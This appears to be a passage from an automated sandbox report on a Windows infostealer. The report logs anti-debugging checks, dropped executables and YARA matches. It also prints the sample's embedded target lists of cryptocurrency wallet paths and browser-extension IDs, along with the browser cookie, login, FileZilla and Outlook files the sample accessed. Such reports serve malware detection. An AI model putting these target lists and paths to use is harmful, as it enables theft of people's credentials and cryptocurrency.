Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Code function: 6_2_04A60000 rdtsc 6_2_04A60000
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C425FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C425FF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C42C410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BD643B mov eax, dword ptr fs:[00000030h] 10_2_00BD643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BDA1A2 mov eax, dword ptr fs:[00000030h] 10_2_00BDA1A2
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C3FB66C
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C3FB1F7
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe"
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHJKKECFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe"
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: CAEHDBAAEC.exe, CAEHDBAAEC.exe, 00000006.00000002.1925142002.000000000072D000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: %Program Manager
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB341 cpuid 0_2_6C3FB341
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C3C35A0
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 6.2.CAEHDBAAEC.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorti.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.2332547916.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1921777147.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1924963108.0000000000531000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2373035840.0000000000BA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1884034371.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1962404330.0000000000BA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2898835808.0000000000BA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1920034287.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1858205526.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\simple-storage.json
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000000.00000002.1858205526.0000000000D56000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1858205526.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1858205526.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR